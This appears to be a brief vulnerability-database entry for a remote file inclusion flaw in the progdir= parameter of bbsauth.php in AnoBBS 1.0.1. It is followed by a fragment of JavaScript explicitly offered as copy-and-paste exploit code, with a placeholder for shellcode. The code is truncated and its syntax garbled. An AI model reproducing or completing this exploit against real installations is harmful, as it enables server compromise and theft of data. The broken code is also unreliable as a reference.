AnoBBS Remote File Inclusion Vulnerability

AnoBBS is an encrypted electronic notice board system. A remote file inclusion vulnerability exists in the progdir= parameter of the bbsauth.php page in AnoBBS version 1.0.1, which can be exploited by an attacker to obtain sensitive information...

AnoBBS 1.0.1 - Remote File Inclusion

Exploitcode for Copy&Paste AnoBBS 1.0.1 Remote File Inclusion Exploit var dir="/progs/" var file="/bbsauth.php?" var parameter ="progdir=" var shell="Insert your shellcode here" function command if document.rfi.target1.value=="" alert"Exploit failed..."; return false; rfi.action=...